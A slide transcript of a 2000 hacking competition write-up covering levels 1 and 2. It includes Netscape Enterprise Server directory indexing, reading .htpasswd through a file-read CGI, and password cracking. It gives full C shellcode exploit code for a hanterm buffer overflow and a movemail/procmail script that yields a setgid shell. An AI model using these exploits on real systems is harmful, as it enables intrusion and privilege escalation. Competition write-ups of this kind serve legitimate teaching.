Transcript OlymFair Workshop Hacking technique

1st OlymFair Workshop
Hacking technique
Taeho Oh
[email protected]
[email protected]
http://postech.edu/~ohhara
Contents
• How to pass level 1
• How to pass level 2
• Why did many hackers consume much time
in the level 2?
• About level 3
• Conclusion
How to pass level 1 (1)
• What to do?
– Execute /cgi-bin/data/idaccess.cgi and get the
way to go to level 2
How to pass level 1 (2)
• Level 1 servers
– 203.227.243.161
– 203.227.243.162
– 203.227.243.163
How to pass level 1 (3)
• 203.227.243.161
– OS : Solaris 8
– Opened TCP port : 80, 8080
How to pass level 1 (4)
• 203.227.243.162
– OS : HPUX 11.0
– Opened TCP port : 22, 80, 8080
How to pass level 1 (5)
• 203.227.243.163
– OS : MS Windows 2000
– Opened TCP port : 7, 9, 13, 17, 19, 25, 80, 135,
139, 443, 1025, 1026, 1032, 1723, 3389
How to pass level 1 (6)
• Attack 203.227.243.161
– 80 : Apache Web Server
– 8080 : Netscape Enterprise Server
• 80 and 8080 web server has same httpd
home directory
• Netscape Enterprise Server has a security
bug
How to pass level 1 (7)
• Netscape Enterprise Server security bug
– I could see files in the specific directory like
below
• http://203.227.243.161/?wp-cs-dump
– You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usrprop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wpstop-ver, and ?wp-uncheckout
– I could browse the directories and check the file
existence
How to pass level 1 (8)
• The file list
/
Can’t access this directory
+----- cgi-bin/
|
+----- data/
|
+----- hackme/
|
+----- a
|
+----- a.c
|
+----- show_file.html
|
+----- showfile.cgi
+----- data/
+----- index.html
How to pass level 1 (9)
• Read .htaccess file with showfile.cgi
– http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgibin/data/.htaccess
• Read .htpasswd file from .htaccess with
showfile.cgi
– http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgibin/data/.htpasswd
How to pass level 1 (10)
• I could crack the encrypted password
from .htpasswd with Crack
– id:password = admin:banana
– I could access /cgi-bin/data directory with this
id and password
How to pass level 1 (11)
• I could get the way to go to level 2
– http://203.227.243.161/data/idaccess.html
• This page is the form that executes
http://203.227.243.161/cgi-bin/data/idaccess.cgi
– My serial number
• KOR000321-961829513
– My password
• oD8YEuqYySWogKSQQsOY00zoAjUkxtv7
How to pass level 1 (12)
• Netscape Enterprise Server directory
indexing vulnerability
– See
http://www.securityfocus.com/vdb/bottom.html
?vid=1063
How to pass level 1 (13)
• Netscape Enterprise Server directory
indexing vulnerability patch information
The Directory Indexing feature can be turned off via the
Administration Interface. Selecting Content Management ->
Document Preferences and changing Directory Indexing to
"none" will disable this feature.
Also, manually editing the file obj.conf will do the same.
Conduct a search for the following:
Service method="(GET|HEAD)" type="magnusinternal/directory"
fn="index-common"
and replace fn="index-common" with fn="send-error".
How to pass level 2 (1)
• What to do?
– Execute /home/forbidden/pass.cgi
•
•
•
•
This executable file owner is root
This executable file group is wizard
The permission is 0510
Need wizard gid to execute
/home/forbidden/pass.cgi
How to pass level 2 (2)
• Level 2 server
– 203.227.243.164
• 203.227.243.164
– OS : Linux
– Opened TCP port : 23, 81
How to pass level 2 (3)
• Wizard setuid or setgid files
-r-sr-xr-x
1 wizard
wizard
26309 Jan
4 09:40 /sbin/pwdb_chkpwd
-rwsr-sr-x
1 wizard
wizard
47692 Mar 29
1999 /sbin/dump
-rwsr-xr-x
1 wizard
wizard
10708 Apr 20
1999 /sbin/cardctl
-rws--x--x
1 wizard
wizard
6148 May 15
-rws--x--x
1 wizard
wizard
158180 May 14
-rwsr-xr-x
1 wizard
wizard
33120 Mar 22
-rwsr-xr-x
1 wizard
wizard
3208 Mar 23
-r-sr-x---
1 wizard
wizard
42652 Aug 31
1999 /usr/bin/inndstart
-r-sr-x---
1 wizard
wizard
40060 Aug 31
1999 /usr/bin/startinnfeed
-r-sr-sr-x
1 wizard
wizard
15816 Jan
7 07:41 /usr/bin/lpq
-r-sr-sr-x
1 wizard
wizard
15608 Jan
7 07:41 /usr/bin/lpr
-r-sr-sr-x
1 wizard
wizard
16248 Jan
7 07:41 /usr/bin/lprm
1999 /usr/X11R6/bin/Xwrapper
1999 /usr/X11R6/bin/hanterm
1999 /usr/bin/at
1999 /usr/bin/disable-paste
How to pass level 2 (4)
• Wizard setuid or setgid files ( Cont. )
-rws--x--x
2 wizard
wizard
517916 Apr
7
1999 /usr/bin/suidperl
-rws--x--x
2 wizard
wizard
517916 Apr
7
1999 /usr/bin/sperl5.00503
-rwsr-sr-x
1 wizard
wizard
64468 Apr
7
1999 /usr/bin/procmail
-rwsr-xr-x
1 wizard
wizard
14036 Apr 16
1999 /usr/bin/rcp
-rwsr-xr-x
1 wizard
wizard
10516 Apr 16
1999 /usr/bin/rlogin
-rwsr-xr-x
1 wizard
wizard
7780 Apr 16
-rwxr-sr-x
1 wizard
redhat-linux/movemail
wizard
17832 May 14
-rwsr-sr-x
1 wizard
wizard
299364 Apr 20
-rwsr-xr-x
1 wizard
wizard
16488 Mar 23
-rwsr-xr-x
1 wizard
wizard
18040 Jan
-rwxr-sr-x
1 wizard
wizard
1999 /usr/bin/rsh
1999 /usr/lib/emacs/20.3/i3861999 /usr/sbin/sendmail
1999 /usr/sbin/traceroute
8 05:24 /usr/sbin/userhelper
3860 Apr 20
1999 /sbin/netreport
How to pass level 2 (5)
• Attack process
Get level2
shell
Create wizard
uid, gid file
Get wizard
euid
Get wizard
gid
Get wizard
uid
Execute
pass.cgi
How to pass level 2 (6)
• level2 shell  wizard euid
– Exploit hanterm bug
[I have no name!@level2 ... ]$ hanterm -hfn `perl -e
"print 'A'x240"`
can't load english font
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAA
[I have no name!@level2 ... ]$ hanterm -hfn `perl -e
"print 'A'x250"`
Segmentation fault
[I have no name!@level2 ... ]$
How to pass level 2 (7)
• level2 shell  wizard euid (Cont.)
– This is a classical buffer overflow bug
– I could get wizard euid shell with 260 buffer
size and -450 offset
How to pass level 2 (8)
• Exploit code
#include<stdio.h>
#include<stdlib.h>
#define OFFSET
-450
#define RET_POSITION
260
#define RANGE
20
#define NOP
0x90
char shellcode[1024]=
"\xeb\x1f“
/* jmp 0x1f
*/
"\x5e“
/* popl %esi
*/
"\x89\x76\x08“
/* movl %esi,0x8(%esi)
*/
How to pass level 2 (9)
• Exploit code (Cont.)
"\x31\xc0“
/* xorl %eax,%eax
*/
"\x88\x46\x07“
/* movb %eax,0x7(%esi)
*/
"\x89\x46\x0c“
/* movl %eax,0xc(%esi)
*/
"\xb0\x0b“
/* movb $0xb,%al
*/
"\x89\xf3“
/* movl %esi,%ebx
*/
"\x8d\x4e\x08“
/* leal 0x8(%esi),%ecx
*/
"\x8d\x56\x0c“
/* leal 0xc(%esi),%edx
*/
"\xcd\x80“
/* int $0x80
*/
"\x31\xdb“
/* xorl %ebx,%ebx
*/
"\x89\xd8“
/* movl %ebx,%eax
*/
How to pass level 2 (10)
• Exploit code (Cont.)
"\x40“
/* inc %eax
*/
"\xcd\x80“
/* int $0x80
*/
"\xe8\xdc\xff\xff\xff“
"/bin/sh";
/* call -0x24
/* .string \"/bin/sh\"
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
*/
*/
How to pass level 2 (11)
• Exploit code (Cont.)
char buff[RET_POSITION+RANGE+1],*ptr;
long *addr_ptr,addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
ptr=buff;
How to pass level 2 (12)
• Exploit code (Cont.)
addr_ptr=(long*)ptr;
for(i=0;i<bsize;i+=4)
*(addr_ptr++)=addr;
for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
buff[i]=NOP;
ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode[i];
buff[bsize-1]='\0';
How to pass level 2 (13)
• Exploit code (Cont.)
execl("/usr/X11R6/bin/hanterm","hanterm",“hfn",buff,0);
}
How to pass level 2 (14)
• wizard euid  wizard uid
[I have no name!@level2 ... ]$ cat > a.c
main(){
setreuid(501,501);
execl("/bin/sh","sh",0);
}
[I have no name!@level2 ... ]$ gcc a.c ; ./a.out
[wizard@level2 ... ]$ whoami
wizard
[wizard@level2 ... ]$
How to pass level 2 (15)
• wizard uid  create wizard uid, gid file
– movemail program is wizard setgid program
• movemail program output file is wizard gid
[wizard@level2 ... ]$ echo haha > test1
[wizard@level2 ... ]$ movemail test1 test2
[wizard@level2 ... ]$ ls –l test1 test2
-rw-r--r--
1 wizard
hackers 0 Jul 10 02:03 test1
-rw-r--r--
1 wizard
wizard
[wizard@level2 ... ]$ cat test2
haha
5 Jul 10 02:03 test2
How to pass level 2 (16)
• wizard uid, gid file  wizard gid
– procmail can execute a arbitrary shell command
with wizard uid, gid when the user can create
wizard uid, gid file
How to pass level 2 (17)
• Exploit code
#!/bin/sh
PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux
export PATH
cat > shh.c << EOF
main(){
setreuid(501,501);
setregid(501,501);
execl("/bin/sh","sh",0);
}
EOF
How to pass level 2 (18)
• Exploit code (Cont.)
gcc shh.c -o shh
movemail shh shh2
cat > proc << EOF
:0
*
| /bin/chmod 6777 /tmp/shh2
EOF
How to pass level 2 (19)
• Exploit code (Cont.)
movemail proc /home/wizard/.procmailrc
echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp
wizard
sleep 2
rm -f /home/wizard/.procmailrc
rm -f ./proc
rm -f ./exp
rm -f ./shh.c
rm -f ./shh
echo "rm -f ./shh2" | ./shh2
How to pass level 2 (20)
• wizard gid  execute pass.cgi
Congratulation!!
You have passed Level 2.
Your ID : KOR000321-961829513
Initial Pass Time Stamp : 2000-06-30 13:59:30GMT+9
IP for Level 3 is 203.227.243.173
It is protected by ip filtering.
Please attack and acquire adminstrator's privilege.And then
change the index.htm
l under level3 server.
Level 3 Login ID
: level3
Level 4 Login Passwd : olymfair3
Why did many hackers consume
much time in the level 2? (1)
• Almost all hackers tried to find a security
bug
– However, level2 can be cleared with not a bug
but a feature. ( except for hanterm bug )
Why did many hackers consume
much time in the level 2? (2)
• /sbin/dump program has a buffer overflow
bug and exploit is not released
– Many hackers try to exploit this program.
However, the exploit is impossible because
main function does not return but exit
Why did many hackers consume
much time in the level 2? (3)
• /usr/bin/lprm exploit code generates
segmentation fault message
– The segmentation fault message is not
generated by /usr/bin/lprm. The message is
generated by /usr/bin/lprm exploit code. It’s an
exploit code bug.
About level 3
• I consumed much time so I have no time to
attack level 3
• I tried to scan level 3 server
– However, I can’t find opened TCP port
– I didn’t try to attack level 3 from then on
• It seemed to take much time
Conclusion
• It was an interesting hacking competition